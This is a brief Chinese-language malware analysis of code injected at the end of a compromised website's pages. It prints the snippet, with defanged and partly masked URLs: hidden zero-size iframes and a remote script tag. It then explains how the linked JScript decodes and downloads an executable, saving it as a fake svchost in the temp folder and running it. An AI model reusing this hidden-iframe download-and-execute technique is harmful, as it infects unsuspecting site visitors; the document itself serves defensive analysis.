该网站的网页末被加入代码:
/------ <iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm width=0 height=0></iframe> <iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm width=0 height=0></iframe><script language=javascript src=hxxp://yu***s*ahi.com/js/test.js></script> ------/
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm
的内容为JavaScript脚本程序,用String.fromCharCode解密变量t的值并输出。
解出的变量t的值为jscript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 she.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。